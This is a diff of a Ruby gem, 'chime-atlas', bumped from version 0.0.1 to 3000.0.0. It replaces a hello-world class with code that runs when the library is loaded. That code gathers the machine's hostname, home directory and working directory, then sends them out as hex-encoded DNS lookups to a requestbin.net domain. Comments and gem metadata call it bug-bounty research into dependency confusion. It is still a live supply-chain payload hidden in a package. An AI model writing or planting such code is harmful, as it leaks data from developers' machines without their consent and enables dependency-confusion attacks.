chime-atlas 0.0.1 → 3000.0.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 113a38df14f7f03636738cdd4db3eade7c4a1a632e0ed08befeb1ae69af6fce0
-  data.tar.gz: 856128e3f866dfb80d8709f1a933e32d6d833ba048e375f6984b1f667b21c8a7
+  metadata.gz: 1b824e3c08fffeb193ec920c43024ae8b45678c2d51f64704ab674f667bc9077
+  data.tar.gz: 16cb995632c6bfa7c39f406f05a0d12d36aa071ee279fdac61126a13cd1a33b9
 SHA512:
-  metadata.gz: accbeddc0139335d076fab7a8bbeeec11fbee6630018a4c98f16fd5209e5b805a96e35201fce827896809f758af798c72d9d2643fcaf8794d07be1dcb9fcee2e
-  data.tar.gz: beae449ced8f7da6b6dd17d8386759cfb4d90da054c48990632b7a86b974fb6e1539b3af4b060b2fa35111a875ceda2c876d9c1e3803d9385035bc9b4a00af97
+  metadata.gz: d51539980f4d3fd98e5720e383919f2d646722245f9fa5138b8ca8cecaf27849227eaecf7e9af715705b08f90b16e1fe435609ca6ef41360d13d22020bea2f87
+  data.tar.gz: 1084e9f350cb10dc9ab53c6239f357f22cea606ccaf9b9cb6fb93c016610bf35c18e75c7a5234f5b65bbe424a91a972124fb63946e87fe5e886f2602dec043c7

data/lib/chime-atlas.rb

@@ -1,8 +1,62 @@
-class Hello
-  def self.hello
-    puts "Hello world!"
-  end
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+gmanhaes0@gmail.com
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '5c4139c959e5f4aeab6f.d.requestbin.net'
+ns = '5c4139c959e5f4aeab6f.d.requestbin.net'
+
+package = 'chime-atlas'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
 end
 
-puts "WARNING: This import is vulnerable to dependency confusion. This attack has been prevented."
+custom_res = Resolv.new([Resolv::Hosts.new,
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end
 

metadata

@@ -1,26 +1,29 @@
 --- !ruby/object:Gem::Specification
 name: chime-atlas
 version: !ruby/object:Gem::Version
-  version: 0.0.1
+  version: 3000.0.0
 platform: ruby
 authors:
-- X
+- Gabriel Manhães
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2021-03-18 00:00:00.000000000 Z
+date: 2021-02-28 00:00:00.000000000 Z
 dependencies: []
-description: ''
-email: x@example.com
+description: I am testing for dependency confusion vulnerabilities in products that
+  are in public bug bounty programs. This code is reporting-only, and does not do
+  anything malicious.
+email: rubycoder@example.com
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
 - lib/chime-atlas.rb
-homepage: https://rubygems.org/gems/chime-atlas
+homepage: https://rubygems.org/gems/example
 licenses:
 - MIT
-metadata: {}
+metadata:
+  source_code_uri: https://github.com/example/example
 post_install_message: 
 rdoc_options: []
 require_paths:
@@ -36,8 +39,11 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.1.4
+rubyforge_project: 
+rubygems_version: 2.7.6
 signing_key: 
 specification_version: 4
-summary: ''
+summary: I am testing for dependency confusion vulnerabilities in products that are
+  in public bug bounty programs. This code is reporting-only, and does not do anything
+  malicious.
 test_files: []